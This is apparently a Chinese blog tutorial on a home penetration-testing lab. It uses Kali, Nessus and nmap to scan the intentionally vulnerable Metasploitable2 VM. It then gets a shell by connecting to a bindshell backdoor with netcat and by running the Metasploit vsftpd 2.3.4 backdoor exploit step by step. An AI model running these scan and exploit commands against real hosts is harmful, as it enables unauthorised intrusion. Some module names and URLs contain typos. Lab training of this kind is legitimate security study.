最详细的系统漏洞扫描并对靶机进行利用攻击演练(模拟一次黑客白帽子操作)
万万不可做坏事,仅为学习参考使用。
一、前提准备
1、所需条件:
(1)kali2.0 linux 的iso文件(最好是32位,为安装nessus做好装备)
下载网址: https://www.kali.org/downloads/
安装步骤请自行百度搜索,基础中的基础
(2)VMware虚拟机,
也可以用其他的虚拟机软件,如vmbox(免费的)
单个人感觉不如VMware好用
VMwawre下载网址: https://www.vmware.com/cn.html
VMware不是免费的,破解请看我其他文章
(3)靶机metaploitable2的安装
下载地址: https://sourceforge.net.projects/metasploitable/
(这个下载地址是官方正规的下载,切记不要在什么不正规的网站资源进行下载)
具体安装步骤视频:
https://www.bilibili.com/video/av60945487/?p=4
(4)所需工具:
nmap(诸神之眼)、metasploit(有名的框架)、nessus(全球最大的漏洞扫描工具)
2、VMware虚拟机的下载并与kali和靶机的安装
3、kali中nessus的安装与使用(请参考我博客中的其他文章)
4、nmap和metasploit是kali系统自带的有名的工具
二、漏洞扫描的原理
漏洞扫描是指基于漏洞数据库,通过扫描等手段对指定的远程或者本地计算机系统的安全脆弱性进行检测,发现可利用漏洞的一种安全检测(渗透攻击)行为。
如果把网络信息安全工作比作一场战争的话,漏洞扫描器就是这场战争中,盘旋在终端设备,网络设备上空的“全球鹰”。
网络安全工作是防守和进攻的博弈,是保证信息安全,工作顺利开展的奠基石。及时和准确地审视自己信息化工作的弱点,审视自己信息平台的漏洞和问题,才能在这场信息安全战争中,处于先机,立于不败之地。只有做到自身的安全,才能立足本职,保证公司业务稳健的运行,这是信息时代开展工作的第一步。
漏洞扫描器,就是保证这场信息战争胜利的开始,它及时准确的察觉到信息平台基础架构的安全,保证业务顺利的开展,保证业务高效迅速的发展,维护公司,企业,国家所有信息资产的安全。(来源于百度搜索)
以下工具与框架都有介绍,扫描漏洞不仅仅下面的几种方法
三、使用nmap进行漏洞扫描(kali中自带的工具)
输入nmap --script vuln 目标ip地址
在进行扫描过程中可以敲回车查看进度,不完全扫描结束后不会出现如上图的结果,
如上图列出了目标主机的后门,并给出了参考链接,一次扫描不到漏洞可以进行多次扫描,
详细使用教程视频链接:
https://www.bilibili.com/video/av62515064
四、nessus的工具的使用(系统漏洞扫描神器)
下载网址: https://zh-cn.tenable.com/products/nessus?tns_redirect=true
记住:使用最左边的免费版
具体安装与使用步骤参考文献:
javascript:void(0)
安装成功后请继续往下看,安装时间有些费时间,需要花些耐心。
举一个靶机的漏洞利用的例子:
如下图扫描的其中一个可以利用的监听的从远程来的链接,绑定shell的漏洞
查看图中的信息可以看到最下面有ip地址和端口信息
需要在kali的终端中输入nc ip地址 端口号便可建立链接
五、用metaploit进行漏洞探测并进行实施攻击
以vsftpd2.3.4为例
1、在kali的终端中输入msfconsole然后等待一定的时间
启动,每次启动的界面都不一样,不必大惊小怪例如下面的一种界面
2、接下来输入search vsftpd来查看vstftpd所具有的漏洞利用代码
3、将搜索到的内容进行利用
输入 use exploit/unix/ftp/vsftpd 234 backdook(根据上图所反馈的信息进行使用)
4、输入show payloads来查看可以用的payloads
5、如上图,输入set payload cmd/unix/interact进行设置payload
6、设置rhost,如下图
7、输入show options查看是否设置成功
8、如果全部设置成功,则完成了一半了
接下来就是输入exploit进行溢出
如下如可以看到反弹成功,得到shell,输入ifconfig可以查看对方的ip地址
以上内容是个人出于爱好和兴趣进行编写,学习者请勿利用所学知识对社会造成干扰,
如出现责任,与本人无关、